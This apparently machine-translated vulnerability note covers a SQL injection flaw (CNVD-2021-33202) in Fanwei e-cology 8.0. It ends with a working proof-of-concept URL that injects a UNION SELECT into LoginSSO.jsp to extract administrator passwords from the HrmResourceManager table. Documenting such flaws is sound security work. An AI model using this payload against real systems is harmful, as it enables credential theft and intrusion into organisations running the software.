Panwei Oa E Cology Loginsso Jsp Sql Injection Vulnerability Cnvd 2021 33202
Panwei Oa E Cology Loginsso Jsp Sql Injection Vulnerability Cnvd 2021 33202
Panwei OA E-Cology LoginSSO.jsp SQL injection vulnerability CNVD-2021-33202
Vulnerability Description
Fanwei e-cology is an OA office system specially made for large and medium-sized enterprises, and supports PC, mobile and WeChat offices to work simultaneously. Panwei e-cology has SQL injection vulnerability.
Vulnerability Impact
Fanwei e-cology 8.0
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager
This post is licensed under CC BY 4.0 by the author.